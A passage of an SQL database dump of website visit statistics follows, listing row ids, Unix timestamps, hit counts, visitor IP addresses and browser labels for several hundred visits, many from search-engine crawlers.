'firefox'),(213203,1519654880,1,1,0,0,'91.196.178.79','firefox'),(213204,1519655095,1,1,0,0,'82.207.49.46','firefox'),(213205,1519655174,1,1,0,0,'95.135.242.15','chrome'),(213206,1519655657,2,2,0,0,'91.196.178.73','chrome'),(213207,1519655742,1,1,0,0,'141.8.142.74','other'),(213208,1519655772,2,2,0,0,'91.196.178.163','chrome'),(213209,1519656218,1,0,1,0,'66.249.66.157',''),(213210,1519658304,1,1,0,0,'54.36.149.59','other'),(213211,1519658312,2,0,2,0,'66.249.66.156',''),(213212,1519658380,1,0,1,0,'66.249.66.157',''),(213213,1519658481,4,4,0,0,'178.154.171.88','other'),(213214,1519658485,1,1,0,0,'87.250.224.46','other'),(213215,1519658882,1,1,0,0,'54.36.148.172','other'),(213216,1519658900,3,3,0,0,'141.8.142.74','other'),(213217,1519659244,1,1,0,0,'54.36.149.66','other'),(213218,1519660033,1,1,0,0,'95.84.232.206','msie'),(213219,1519660227,1,1,0,0,'54.36.148.75','other'),(213220,1519660257,1,1,0,0,'178.154.171.88','other'),(213221,1519660258,1,1,0,0,'141.8.142.74','other'),(213222,1519660417,2,2,0,0,'77.111.244.15','chrome'),(213223,1519660959,1,1,0,0,'93.80.129.103','msie'),(213224,1519661508,1,1,0,0,'54.36.148.150','other'),(213225,1519662586,1,1,0,0,'54.36.148.239','other'),(213226,1519662715,1,1,0,0,'54.36.149.51','other'),(213227,1519663662,1,1,0,0,'188.230.43.254','other'),(213228,1519663684,1,0,1,0,'66.249.66.156',''),(213229,1519663802,1,0,1,0,'66.249.66.157',''),(213230,1519664114,1,1,0,0,'54.36.148.39','other'),(213231,1519664128,1,1,0,0,'66.249.66.155','chrome'),(213232,1519664267,1,1,0,0,'8.29.198.25','other'),(213233,1519664269,1,1,0,0,'95.132.223.55','firefox'),(213234,1519664338,1,1,0,0,'46.211.6.188','chrome'),(213235,1519664554,2,2,0,0,'91.196.178.164','chrome'),(213236,1519664596,1,1,0,0,'141.8.142.74','other'),(213237,1519664624,1,1,0,0,'54.36.148.53','other'),(213238,1519664792,1,1,0,0,'91.196.177.8','chrome'),(213239,1519664831,1,1,0,0,'213.108.45.138','firefox'),(213240,1519665609,1,1,0,0,'54.36.148.120','other'),(213241,1519665636,1,1,0,0,'54.36.148.65','other'),(213242,1519665638,2,2,0,0,'92.113.188.43','chrome'),(213243,1519666105,1,1,0,0,'188.230.43.254','other'),(213244,1519666250,1,1,0,0,'54.36.148.232','other'),(213245,1519667335,2,2,0,0,'92.113.188.43','chrome'),(213246,1519667463,1,1,0,0,'66.249.66.74','chrome'),(213247,1519667496,1,1,0,0,'66.249.66.155','chrome'),(213248,1519667508,1,1,0,0,'54.36.148.241','other'),(213249,1519667521,1,1,0,0,'54.36.148.222','other'),(213250,1519667531,1,1,0,0,'54.36.148.143','other'),(213251,1519667761,1,1,0,0,'54.36.148.194','other'),(213252,1519667788,1,1,0,0,'54.36.149.67','other'),(213253,1519668008,1,1,0,0,'188.230.43.254','other'),(213254,1519668151,1,1,0,0,'54.36.148.82','other'),(213255,1519668631,1,1,0,0,'178.154.171.88','other'),(213256,1519668795,1,1,0,0,'54.36.148.188','other'),(213257,1519668877,1,1,0,0,'54.36.149.92','other'),(213258,1519668955,1,1,0,0,'54.36.148.127','other'),(213259,1519669708,1,1,0,0,'54.36.149.33','other'),(213260,1519669891,1,1,0,0,'54.36.148.102','other'),(213261,1519669906,1,1,0,0,'178.154.171.88','other'),(213262,1519670259,1,1,0,0,'188.230.43.254','other'),(213263,1519670377,1,1,0,0,'91.196.178.129','chrome'),(213264,1519671123,124,124,0,0,'217.182.194.69','other'),(213265,1519671251,1,1,0,0,'54.36.148.187','other'),(213266,1519671334,1,1,0,0,'54.36.148.84','other'),(213267,1519671465,1,1,0,0,'54.36.148.222','other'),(213268,1519671610,2,2,0,0,'92.113.188.43','chrome'),(213269,1519671676,1,1,0,0,'92.113.196.50','chrome'),(213270,1519671689,1,1,0,0,'54.36.148.54','other'),(213271,1519671698,2,2,0,0,'91.196.178.58','chrome'),(213272,1519671893,1,1,0,0,'54.36.148.148','other'),(213273,1519671958,1,1,0,0,'66.249.66.74','chrome'),(213274,1519672030,114,114,0,0,'217.182.194.69','other'),(213275,1519672037,1,1,0,0,'54.36.148.93','other'),(213276,1519672047,1,1,0,0,'54.36.148.200','other'),(213277,1519672262,1,0,1,0,'66.249.66.157',''),(213278,1519672670,19,19,0,0,'178.154.171.88','other'),(213279,1519672676,17,17,0,0,'141.8.142.74','other'),(213280,1519672707,4,4,0,0,'87.250.224.46','other'),(213281,1519672932,120,120,0,0,'217.182.194.69','other'),(213282,1519673368,1,1,0,0,'54.36.148.104','other'),(213283,1519673558,1,1,0,0,'46.211.106.60','other'),(213284,1519673628,1,1,0,0,'54.36.148.101','other'),(213285,1519673745,1,1,0,0,'54.36.148.167','other'),(213286,1519673822,1,0,1,0,'66.249.66.157',''),(213287,1519673894,86,86,0,0,'217.182.194.69','other'),(213288,1519673909,1,0,1,0,'66.249.66.155',''),(213289,1519674294,1,1,0,0,'87.250.224.46','other'),(213290,1519674340,1,1,0,0,'54.36.149.23','other'),(213291,1519674355,1,1,0,0,'141.8.142.74','other'),(213292,1519674438,2,2,0,0,'37.54.16.245','chrome'),(213293,1519674442,1,1,0,0,'54.36.148.232','other'),(213294,1519674824,73,73,0,0,'217.182.194.69','other'),(213295,1519675135,1,1,0,0,'8.29.198.25','other'),(213296,1519675294,1,1,0,0,'54.36.148.191','other'),(213297,1519675380,1,1,0,0,'54.36.149.28','other'),(213298,1519675642,1,1,0,0,'141.8.142.74','other'),(213299,1519675643,2,2,0,0,'178.154.171.88','other'),(213300,1519675730,101,101,0,0,'217.182.194.69','other'),(213301,1519676034,1,1,0,0,'157.55.39.171','other'),(213302,1519676478,1,1,0,0,'54.36.148.66','other'),(213303,1519676636,41,41,0,0,'217.182.194.69','other'),(213304,1519676852,1,1,0,0,'54.36.149.16','other'),(213305,1519677872,1,1,0,0,'54.36.149.21','other'),(213306,1519678384,1,1,0,0,'54.36.148.48','other'),(213307,1519678434,1,1,0,0,'54.36.148.199','other'),(213308,1519678845,1,1,0,0,'54.36.148.13','other'),(213309,1519679968,1,1,0,0,'54.36.148.14','other'),(213310,1519680007,1,1,0,0,'54.36.148.223','other'),(213311,1519681089,1,1,0,0,'54.36.148.42','other'),(213312,1519681140,1,1,0,0,'54.36.148.54','other'),(213313,1519681349,1,1,0,0,'54.36.148.154','other'),(213314,1519681399,1,1,0,0,'54.36.149.25','other'),(213315,1519681768,1,1,0,0,'54.36.148.67','other'),(213316,1519681879,1,1,0,0,'54.36.148.28','other'),(213317,1519682511,1,1,0,0,'54.36.148.155','other'),(213318,1519682523,1,1,0,0,'195.181.172.219','chrome'),(213319,1519682792,1,1,0,0,'54.36.148.221','other'),(213320,1519682922,1,1,0,0,'54.36.148.194','other'),(213321,1519682928,1,1,0,0,'54.36.148.41','other'),(213322,1519683251,1,1,0,0,'54.36.148.26','other'),(213323,1519683252,1,1,0,0,'54.36.148.152','other'),(213324,1519683806,1,1,0,0,'54.36.148.155','other'),(213325,1519683977,1,1,0,0,'54.36.149.60','other'),(213326,1519684353,1,1,0,0,'164.132.56.69','chrome'),(213327,1519684488,2,2,0,0,'141.8.142.74','other'),(213328,1519684532,1,1,0,0,'54.36.148.124','other'),(213329,1519685301,1,1,0,0,'157.55.39.171','other'),(213330,1519685613,1,1,0,0,'54.36.149.3','other'),(213331,1519685620,1,0,1,0,'66.249.66.157',''),(213332,1519685961,1,1,0,0,'54.36.148.119','other'),(213333,1519686026,1,1,0,0,'8.29.198.25','other'),(213334,1519686136,1,1,0,0,'54.36.148.181','other'),(213335,1519686218,1,1,0,0,'178.121.213.113','chrome'),(213336,1519686790,2,2,0,0,'54.165.59.7','other'),(213337,1519687051,1,1,0,0,'157.55.39.184','other'),(213338,1519687192,1,1,0,0,'54.36.148.81','other'),(213339,1519687227,1,1,0,0,'54.36.149.13','other'),(213340,1519688178,1,1,0,0,'54.36.149.18','other'),(213341,1519688456,1,0,1,0,'66.249.66.156',''),(213342,1519688680,1,1,0,0,'54.36.148.253','other'),(213343,1519689177,1,1,0,0,'180.76.15.135','other'),(213344,1519689299,1,1,0,0,'176.14.34.104','msie'),(213345,1519689491,1,1,0,0,'54.36.149.83','other'),(213346,1519689542,1,1,0,0,'54.36.148.98','other'),(213347,1519689594,1,1,0,0,'54.36.148.82','other'),(213348,1519689867,1,1,0,0,'54.36.148.158','other'),(213349,1519690175,1,1,0,0,'54.36.148.91','other'),(213350,1519690700,1,1,0,0,'40.77.167.165','other'),(213351,1519691177,1,1,0,0,'180.76.15.139','other'),(213352,1519691506,1,0,1,0,'66.249.66.157',''),(213353,1519691596,1,1,0,0,'66.249.66.75','chrome'),(213354,1519691598,1,1,0,0,'66.249.66.155','chrome'),(213355,1519691777,1,1,0,0,'141.8.142.74','other'),(213356,1519692497,1,0,1,0,'66.249.66.157',''),(213357,1519692563,1,0,1,0,'66.249.66.155',''),(213358,1519692893,1,0,1,0,'66.249.66.156',''),(213359,1519692910,1,1,0,0,'66.249.66.155','chrome'),(213360,1519692936,1,1,0,0,'54.36.148.18','other'),(213361,1519693459,1,1,0,0,'54.36.149.89','other'),(213362,1519693545,1,1,0,0,'54.36.148.71','other'),(213363,1519693843,1,1,0,0,'54.36.148.47','other'),(213364,1519694203,1,0,1,0,'66.249.66.155',''),(213365,1519694864,1,1,0,0,'54.36.148.160','other'),(213366,1519695283,2,2,0,0,'54.36.148.22','other'),(213367,1519695562,1,1,0,0,'54.36.148.11','other'),(213368,1519695808,1,1,0,0,'54.36.148.206','other'),(213369,1519695898,1,1,0,0,'54.36.148.135','other'),(213370,1519696896,1,1,0,0,'8.29.198.27','other'),(213371,1519697534,1,1,0,0,'54.36.148.218','other'),(213372,1519698342,1,1,0,0,'54.36.148.184','other'),(213373,1519698595,1,1,0,0,'54.36.148.58','other'),(213374,1519699175,1,1,0,0,'54.36.148.146','other'),(213375,1519699452,1,1,0,0,'54.36.148.61','other'),(213376,1519699638,1,1,0,0,'180.76.15.8','other'),(213377,1519699844,1,1,0,0,'54.36.149.15','other'),(213378,1519699968,1,1,0,0,'54.36.148.78','other'),(213379,1519700230,1,1,0,0,'54.36.149.19','other'),(213380,1519700233,6,6,0,0,'141.8.142.74','other'),(213381,1519700236,2,2,0,0,'87.250.224.46','other'),(213382,1519700285,1,1,0,0,'107.167.105.218','other'),(213383,1519700467,1,1,0,0,'54.36.149.21','other'),(213384,1519700559,1,1,0,0,'54.36.149.48','other'),(213385,1519700643,1,1,0,0,'54.36.149.47','other'),(213386,1519700660,1,1,0,0,'54.36.148.175','other'),(213387,1519700689,3,3,0,0,'178.154.171.88','other'),(213388,1519700958,1,1,0,0,'54.36.149.84','other'),(213389,1519701126,1,1,0,0,'54.36.148.153','other'),(213390,1519701226,1,1,0,0,'54.36.149.105','other'),(213391,1519701437,2,2,0,0,'141.8.142.74','other'),(213392,1519701451,1,1,0,0,'141.8.132.19','other'),(213393,1519701605,1,1,0,0,'54.36.148.124','other'),(213394,1519701902,1,1,0,0,'66.249.66.74','chrome'),(213395,1519701911,1,1,0,0,'66.249.66.156','chrome'),(213396,1519701964,1,1,0,0,'54.36.148.15','other'),(213397,1519702037,1,1,0,0,'54.36.148.85','other'),(213398,1519702230,1,1,0,0,'54.36.149.59','other'),(213399,1519703351,1,0,1,0,'66.249.66.155',''),(213400,1519703826,1,0,1,0,'66.249.66.156',''),(213401,1519703925,1,1,0,0,'157.55.39.171','other'),(213402,1519704244,1,1,0,0,'54.36.149.92','other'),(213403,1519704860,1,1,0,0,'54.36.149.79','other'),(213404,1519704901,1,1,0,0,'54.36.149.26','other'),(213405,1519706002,1,1,0,0,'54.36.148.141','other'),(213406,1519706184,1,1,0,0,'54.36.148.248','other'),(213407,1519706242,1,1,0,0,'54.36.148.186','other'),(213408,1519706577,1,1,0,0,'54.36.148.79','other'),(213409,1519706820,1,1,0,0,'54.36.148.102','other'),(213410,1519706937,1,1,0,0,'54.36.149.97','other'),(213411,1519706968,125,125,0,0,'88.99.19.242','other'),(213412,1519707063,1,1,0,0,'40.77.167.177','other'),(213413,1519707516,1,1,0,0,'54.36.148.92','other'),(213414,1519707764,1,1,0,0,'8.29.198.27','other'),(213415,1519708228,1,1,0,0,'54.36.149.39','other'),(213416,1519708321,1,1,0,0,'54.36.148.126','other'),(213417,1519709062,2,0,2,0,'66.249.66.155',''),(213418,1519709905,1,1,0,0,'54.36.148.196','other'),(213419,1519710267,1,1,0,0,'54.36.148.138','other'),(213420,1519710356,1,1,0,0,'54.36.148.220','other'),(213421,1519710402,1,1,0,0,'37.9.113.182','other'),(213422,1519710515,1,1,0,0,'54.36.148.183','other'),(213423,1519710963,1,1,0,0,'54.36.149.90','other'),(213424,1519711483,1,1,0,0,'54.36.149.34','other'),(213425,1519711541,1,0,1,0,'66.249.66.76',''),(213426,1519712051,1,1,0,0,'66.249.66.74','chrome'),(213427,1519712053,1,1,0,0,'66.249.66.156','chrome'),(213428,1519712173,1,1,0,0,'54.36.148.128','other'),(213429,1519712236,1,1,0,0,'77.111.244.25','chrome'),(213430,1519712414,1,1,0,0,'54.36.148.174','other'),(213431,1519712531,1,1,0,0,'54.36.148.197','other'),(213432,1519712539,1,1,0,0,'54.36.149.48','other'),(213433,1519712811,1,1,0,0,'54.36.148.116','other'),(213434,1519712820,1,1,0,0,'54.36.148.84','other'),(213435,1519712902,1,1,0,0,'91.196.178.73','chrome'),(213436,1519713436,1,1,0,0,'54.36.148.226','other'),(213437,1519713632,1,1,0,0,'54.36.149.104','other'),(213438,1519713721,1,1,0,0,'54.36.149.65','other'),(213439,1519713834,1,1,0,0,'91.196.178.65','firefox'),(213440,1519714375,1,0,1,0,'66.249.66.156',''),(213441,1519714541,1,1,0,0,'54.36.148.129','other'),(213442,1519714890,1,0,1,0,'66.249.66.155',''),(213443,1519714900,1,1,0,0,'78.71.80.49','firefox'),(213444,1519715451,2,2,0,0,'91.196.178.93','chrome'),(213445,1519715475,1,1,0,0,'54.36.148.49','other'),(213446,1519715497,2,2,0,0,'91.196.178.73','chrome'),(213447,1519715572,1,1,0,0,'54.36.148.68','other'),(213448,1519715740,1,1,0,0,'54.36.149.89','other'),(213449,1519716988,2,2,0,0,'213.108.45.138','chrome'),(213450,1519717116,1,1,0,0,'54.36.149.21','other'),(213451,1519717671,1,1,0,0,'54.36.148.204','other'),(213452,1519717672,1,1,0,0,'54.36.148.79','other'),(213453,1519718024,1,1,0,0,'91.124.143.72','chrome'),(213454,1519718291,2,2,0,0,'195.230.119.34','chrome'),(213455,1519718547,1,1,0,0,'54.36.149.63','other'),(213456,1519718640,1,1,0,0,'8.29.198.25','other'),(213457,1519718735,1,1,0,0,'54.36.149.104','other'),(213458,1519718992,1,1,0,0,'54.36.148.214','other'),(213459,1519719050,1,0,1,0,'66.249.66.156',''),(213460,1519719218,2,0,2,0,'66.249.66.155',''),(213461,1519719408,2,2,0,0,'91.196.178.86','chrome'),(213462,1519719569,1,1,0,0,'54.36.148.217','other'),(213463,1519719857,1,1,0,0,'77.111.244.29','chrome'),(213464,1519719882,1,1,0,0,'54.36.148.10','other'),(213465,1519720118,1,1,0,0,'54.36.148.183','other'),(213466,1519720228,1,1,0,0,'66.249.66.156','chrome'),(213467,1519720660,2,2,0,0,'91.196.177.15','chrome'),(213468,1519720677,1,1,0,0,'178.154.171.88','other'),(213469,1519720740,1,1,0,0,'54.36.149.66','other'),(213470,1519721228,1,1,0,0,'54.36.148.86','other'),(213471,1519721241,1,0,1,0,'66.249.66.155',''),(213472,1519721335,2,2,0,0,'130.180.218.224','chrome'),(213473,1519721398,1,1,0,0,'66.249.66.74','chrome'),(213474,1519721399,1,1,0,0,'66.249.66.156','chrome'),(213475,1519721528,2,2,0,0,'212.90.63.71','chrome'),(213476,1519722017,1,1,0,0,'54.36.148.72','other'),(213477,1519722044,3,3,0,0,'91.196.178.6','chrome'),(213478,1519722304,1,1,0,0,'213.108.45.138','chrome'),(213479,1519722318,1,1,0,0,'54.36.149.3','other'),(213480,1519722524,1,1,0,0,'54.36.149.43','other'),(213481,1519722886,1,1,0,0,'54.36.149.18','other'),(213482,1519723095,1,1,0,0,'13.56.229.65','chrome'),(213483,1519723619,2,0,2,0,'66.249.66.155',''),(213484,1519724077,1,1,0,0,'54.36.149.62','other'),(213485,1519724286,1,1,0,0,'54.36.148.36','other'),(213486,1519724449,1,1,0,0,'54.36.148.102','other'),(213487,1519724800,2,0,2,0,'66.249.66.157',''),(213488,1519725081,1,1,0,0,'54.36.149.77','other'),(213489,1519725452,5,5,0,0,'91.196.178.86','chrome'),(213490,1519726118,1,1,0,0,'54.36.148.124','other'),(213491,1519726150,1,1,0,0,'54.36.148.58','other'),(213492,1519726209,1,1,0,0,'54.36.148.132','other'),(213493,1519726440,1,1,0,0,'91.196.178.166','chrome'),(213494,1519726481,1,1,0,0,'54.36.148.54','other'),(213495,1519726584,1,1,0,0,'54.36.149.2','other'),(213496,1519727106,2,2,0,0,'91.196.178.86','chrome'),(213497,1519727117,1,0,1,0,'66.249.66.156',''),(213498,1519727295,1,1,0,0,'54.36.148.80','other'),(213499,1519727619,1,1,0,0,'54.165.59.7','other'),(213500,1519727942,1,1,0,0,'188.166.121.88','chrome'),(213501,1519728277,1,1,0,0,'54.36.149.14','other'),(213502,1519729041,1,0,1,0,'66.249.66.155',''),(213503,1519729130,1,1,0,0,'141.8.132.19','other'),(213504,1519729133,2,2,0,0,'178.154.171.88','other'),(213505,1519729304,1,1,0,0,'207.46.13.177','other'),(213506,1519729358,2,2,0,0,'130.180.218.224','chrome'),(213507,1519729489,1,1,0,0,'77.111.244.58','chrome'),(213508,1519729545,1,1,0,0,'8.29.198.25','other'),(213509,1519730140,1,1,0,0,'54.174.3.52','other'),(213510,1519731203,1,1,0,0,'180.76.15.149','other'),(213511,1519732829,1,1,0,0,'141.8.142.74','other'),(213512,1519734110,1,1,0,0,'91.196.178.130','chrome'),(213513,1519734162,2,2,0,0,'207.46.13.91','other'),(213514,1519734228,1,1,0,0,'92.113.174.166','chrome'),(213515,1519734612,1,0,1,0,'66.249.66.155',''),(213516,1519734765,1,1,0,0,'207.46.13.108','other'),(213517,1519734834,1,1,0,0,'66.249.66.74','chrome'),(213518,1519734850,1,1,0,0,'66.249.66.157','chrome'),(213519,1519734932,2,2,0,0,'178.154.171.88','other'),(213520,1519735056,1,1,0,0,'141.8.142.74','other'),(213521,1519735681,1,1,0,0,'93.72.17.232','chrome'),(213522,1519735699,1,1,0,0,'77.111.244.21','chrome'),(213523,1519735881,1,1,0,0,'66.102.9.25','chrome'),(213524,1519736166,1,1,0,0,'78.137.4.163','firefox'),(213525,1519736244,1,0,1,0,'66.249.66.157',''),(213526,1519736260,2,2,0,0,'130.180.218.224','chrome'),(213527,1519736348,1,0,1,0,'66.249.66.155',''),(213528,1519737273,6,6,0,0,'46.201.241.5','chrome'),(213529,1519737297,2,2,0,0,'91.196.178.161','chrome'),(213530,1519737590,2,2,0,0,'91.196.178.86','chrome'),(213531,1519737802,1,1,0,0,'195.201.36.1','other'),(213532,1519737979,1,1,0,0,'178.154.171.88','other'),(213533,1519738205,2,2,0,0,'134.249.147.14','chrome'),(213534,1519739900,1,1,0,0,'81.162.237.121','chrome'),(213535,1519740000,1,1,0,0,'54.36.148.91','other'),(213536,1519740042,1,1,0,0,'54.36.148.71','other'),(213537,1519740279,1,1,0,0,'78.137.4.163','firefox'),(213538,1519740417,1,1,0,0,'8.29.198.27','other'),(213539,1519740580,1,1,0,0,'54.36.148.198','other'),(213540,1519740819,1,1,0,0,'54.36.149.75','other'),(213541,1519740946,1,0,1,0,'66.249.66.157',''),(213542,1519741010,1,1,0,0,'54.36.148.162','other'),(213543,1519741248,1,1,0,0,'54.36.148.216','other'),(213544,1519741355,2,2,0,0,'91.196.178.7','chrome'),(213545,1519742013,1,1,0,0,'54.36.148.239','other'),(213546,1519742111,1,1,0,0,'54.36.148.103','other'),(213547,1519742116,1,1,0,0,'54.165.59.7','other'),(213548,1519742339,1,1,0,0,'141.8.142.74','other'),(213549,1519742346,1,1,0,0,'54.36.149.91','other'),(213550,1519742394,2,2,0,0,'91.196.178.86','chrome'),(213551,1519742605,1,1,0,0,'54.36.148.101','other'),(213552,1519742881,1,0,1,0,'66.249.66.157',''),(213553,1519743014,1,1,0,0,'92.112.230.184','firefox'),(213554,1519743144,1,1,0,0,'54.36.148.187','other'),(213555,1519743651,1,1,0,0,'54.36.148.114','other'),(213556,1519743892,2,2,0,0,'91.196.178.7','chrome'),(213557,1519744645,1,1,0,0,'54.36.148.67','other'),(213558,1519744924,1,1,0,0,'54.36.149.79','other'),(213559,1519745152,1,1,0,0,'207.46.13.91','other'),(213560,1519745164,1,1,0,0,'54.36.148.250','other'),(213561,1519745259,1,1,0,0,'91.196.178.7','chrome'),(213562,1519745543,1,1,0,0,'66.249.66.74','chrome'),(213563,1519745546,1,1,0,0,'66.249.66.157','chrome'),(213564,1519745573,1,1,0,0,'207.46.13.108','other'),(213565,1519745785,2,2,0,0,'37.73.200.233','chrome'),(213566,1519745915,1,1,0,0,'91.196.178.68','firefox'),(213567,1519746017,1,1,0,0,'54.36.148.62','other'),(213568,1519746773,1,1,0,0,'54.36.148.80','other'),(213569,1519747024,1,1,0,0,'54.36.149.12','other'),(213570,1519747148,1,1,0,0,'54.36.148.245','other'),(213571,1519747321,1,1,0,0,'78.25.15.187','chrome'),(213572,1519747638,1,1,0,0,'54.36.148.168','other'),(213573,1519747997,2,0,2,0,'66.249.66.157',''),(213574,1519748036,1,1,0,0,'77.111.244.64','chrome'),(213575,1519748109,1,1,0,0,'77.111.244.30','chrome'),(213576,1519748131,1,1,0,0,'54.36.148.148','other'),(213577,1519748245,1,1,0,0,'188.230.43.254','other'),(213578,1519748417,1,1,0,0,'207.46.13.177','other'),(213579,1519748540,1,1,0,0,'54.36.148.224','other'),(213580,1519748772,1,1,0,0,'178.223.211.23','firefox'),(213581,1519748834,1,1,0,0,'207.46.13.42','other'),(213582,1519748938,1,1,0,0,'54.36.148.129','other'),(213583,1519748956,1,1,0,0,'54.36.148.199','other'),(213584,1519749325,1,1,0,0,'141.8.142.74','other'),(213585,1519749635,1,1,0,0,'54.36.149.93','other'),(213586,1519750281,1,1,0,0,'178.154.171.88','other'),(213587,1519750502,1,1,0,0,'188.230.43.254','other'),(213588,1519750749,1,1,0,0,'54.36.148.104','other'),(213589,1519750784,1,1,0,0,'54.36.148.70','other'),(213590,1519750925,1,0,1,0,'66.249.66.157',''),(213591,1519750991,1,1,0,0,'141.8.142.74','other'),(213592,1519751029,1,1,0,0,'87.250.224.46','other'),(213593,1519751090,1,1,0,0,'66.249.66.156','chrome'),(213594,1519751097,1,1,0,0,'66.249.66.75','chrome'),(213595,1519751281,1,1,0,0,'8.29.198.26','other'),(213596,1519751316,1,1,0,0,'178.94.172.43','chrome'),(213597,1519751428,1,1,0,0,'54.36.148.93','other'),(213598,1519751962,1,1,0,0,'54.36.148.241','other'),(213599,1519752169,1,1,0,0,'54.36.148.179','other'),(213600,1519752235,1,1,0,0,'91.196.178.7','chrome'),(213601,1519752438,1,1,0,0,'54.36.148.126','other'),(213602,1519752661,1,1,0,0,'54.36.148.171','other'),(213603,1519753059,1,1,0,0,'188.230.43.254','other'),(213604,1519753094,1,1,0,0,'54.36.148.14','other'),(213605,1519753127,1,1,0,0,'54.36.149.28','other'),(213606,1519753323,1,1,0,0,'54.36.149.48','other'),(213607,1519753803,1,1,0,0,'207.46.13.91','other'),(213608,1519753860,1,1,0,0,'66.249.66.156','chrome'),(213609,1519753942,1,1,0,0,'54.36.148.215','other'),(213610,1519754845,1,1,0,0,'54.36.148.127','other'),(213611,1519755284,1,1,0,0,'207.46.13.42','other'),(213612,1519755453,2,2,0,0,'91.196.178.34','chrome'),(213613,1519756844,1,1,0,0,'54.36.148.137','other'),(213614,1519756896,1,1,0,0,'54.36.148.159','other'),(213615,1519756913,1,0,1,0,'66.249.66.75',''),(213616,1519757191,1,1,0,0,'66.249.66.157','chrome'),(213617,1519757195,1,1,0,0,'66.249.66.75','chrome'),(213618,1519757214,1,1,0,0,'54.36.148.218','other'),(213619,1519757689,1,0,1,0,'66.249.66.76',''),(213620,1519757732,1,1,0,0,'54.36.149.18','other'),(213621,1519757846,1,1,0,0,'54.36.148.48','other'),(213622,1519757862,1,1,0,0,'54.36.148.91','other'),(213623,1519757894,1,1,0,0,'54.36.148.164','other'),(213624,1519758100,1,1,0,0,'54.36.148.191','other'),(213625,1519758492,1,1,0,0,'54.36.148.166','other'),(213626,1519758938,1,1,0,0,'207.46.13.108','other'),(213627,1519759261,1,1,0,0,'54.36.148.185','other'),(213628,1519760124,1,1,0,0,'54.36.148.182','other'),(213629,1519760125,1,0,1,0,'66.249.66.155',''),(213630,1519760127,1,1,0,0,'141.8.142.74','other'),(213631,1519760149,1,1,0,0,'66.249.66.156','chrome'),(213632,1519760189,1,1,0,0,'5.3.146.45','msie'),(213633,1519760743,1,1,0,0,'54.36.148.93','other'),(213634,1519760952,1,1,0,0,'178.223.211.23','firefox'),(213635,1519761461,1,0,1,0,'66.249.66.155',''),(213636,1519761614,1,1,0,0,'54.36.149.95','other'),(213637,1519761713,1,1,0,0,'54.36.148.53','other'),(213638,1519762106,1,1,0,0,'54.36.149.90','other'),(213639,1519762162,1,1,0,0,'8.29.198.25','other'),(213640,1519762662,1,1,0,0,'141.8.142.74','other'),(213641,1519762665,1,1,0,0,'178.154.171.88','other'),(213642,1519762964,1,1,0,0,'91.196.178.164','chrome'),(213643,1519763438,1,1,0,0,'54.36.148.228','other'),(213644,1519763817,1,1,0,0,'87.250.224.46','other'),(213645,1519763833,2,2,0,0,'54.36.148.166','other'),(213646,1519764258,1,1,0,0,'54.36.148.28','other'),(213647,1519764327,1,1,0,0,'54.36.148.159','other'),(213648,1519764553,1,1,0,0,'54.36.149.9','other'),(213649,1519764645,1,1,0,0,'54.36.149.58','other'),(213650,1519764669,1,1,0,0,'207.46.13.104','other'),(213651,1519764806,2,0,2,0,'66.249.66.201',''),(213652,1519765162,1,1,0,0,'54.36.148.35','other'),(213653,1519765175,1,1,0,0,'54.36.148.231','other'),(213654,1519765182,1,1,0,0,'54.36.148.174','other'),(213655,1519765246,1,0,1,0,'66.249.66.199',''),(213656,1519765252,2,0,2,0,'66.249.66.195',''),(213657,1519765573,1,1,0,0,'54.36.148.66','other'),(213658,1519766162,1,1,0,0,'188.32.41.196','msie'),(213659,1519766163,1,1,0,0,'178.140.89.31','msie'),(213660,1519766179,1,1,0,0,'54.36.148.135','other'),(213661,1519766412,1,1,0,0,'54.36.148.213','other'),(213662,1519766494,1,1,0,0,'54.36.148.165','other'),(213663,1519766570,1,1,0,0,'54.36.148.75','other'),(213664,1519767110,1,1,0,0,'54.36.148.140','other'),(213665,1519767267,1,1,0,0,'130.180.208.78','chrome'),(213666,1519767414,1,1,0,0,'54.36.149.90','other'),(213667,1519768379,1,1,0,0,'128.69.225.174','chrome'),(213668,1519768380,1,1,0,0,'95.24.28.44','chrome'),(213669,1519768382,1,1,0,0,'46.188.106.43','firefox'),(213670,1519768384,1,1,0,0,'78.106.114.216','chrome'),(213671,1519768439,1,1,0,0,'141.8.142.74','other'),(213672,1519768513,1,1,0,0,'54.36.148.100','other'),(213673,1519768518,2,0,2,0,'66.249.66.199',''),(213674,1519768660,1,1,0,0,'66.249.66.195','chrome'),(213675,1519768661,1,1,0,0,'66.249.66.74','chrome'),(213676,1519768691,1,1,0,0,'54.36.149.43','other'),(213677,1519768858,1,1,0,0,'54.36.149.62','other'),(213678,1519769837,1,1,0,0,'54.36.148.115','other'),(213679,1519770144,1,1,0,0,'54.36.149.31','other'),(213680,1519770362,1,1,0,0,'54.36.149.49','other'),(213681,1519771046,1,1,0,0,'54.36.148.46','other'),(213682,1519771295,1,1,0,0,'54.36.148.14','other'),(213683,1519771366,1,1,0,0,'54.36.149.76','other'),(213684,1519771389,1,1,0,0,'54.36.148.153','other'),(213685,1519771410,1,1,0,0,'54.36.148.192','other'),(213686,1519771889,1,1,0,0,'54.36.149.19','other'),(213687,1519772007,1,1,0,0,'54.36.149.16','other'),(213688,1519772099,1,1,0,0,'54.36.149.20','other'),(213689,1519772697,1,1,0,0,'54.36.149.85','other'),(213690,1519772838,1,0,1,0,'66.249.66.157',''),(213691,1519773043,1,1,0,0,'8.29.198.25','other'),(213692,1519773500,1,1,0,0,'54.36.149.60','other'),(213693,1519773523,1,1,0,0,'207.46.13.42','other'),(213694,1519774069,1,1,0,0,'54.36.148.83','other'),(213695,1519774152,1,1,0,0,'54.36.149.35','other'),(213696,1519775083,2,0,2,0,'66.249.66.157',''),(213697,1519775098,1,1,0,0,'87.250.224.46','other'),(213698,1519775178,8,8,0,0,'141.8.142.74','other'),(213699,1519775182,4,4,0,0,'178.154.171.88','other'),(213700,1519775220,1,1,0,0,'54.36.148.10','other'),(213701,1519775333,1,1,0,0,'66.249.66.155','chrome'),(213702,1519775337,1,1,0,0,'66.249.66.74','chrome'),(213703,1519775405,1,1,0,0,'54.36.148.139','other'),(213704,1519775472,1,1,0,0,'54.36.148.146','other'),(213705,1519775710,1,1,0,0,'35.153.66.239','other'),(213706,1519776395,1,1,0,0,'54.36.148.21','other'),(213707,1519776445,1,1,0,0,'54.36.148.231','other'),(213708,1519776505,1,1,0,0,'54.36.148.137','other'),(213709,1519776876,1,1,0,0,'54.36.148.151','other'),(213710,1519777040,1,1,0,0,'54.36.148.81','other'),(213711,1519777394,1,0,1,0,'66.249.66.157',''),(213712,1519777751,1,0,1,0,'66.249.66.155',''),(213713,1519777889,1,1,0,0,'54.36.148.24','other'),(213714,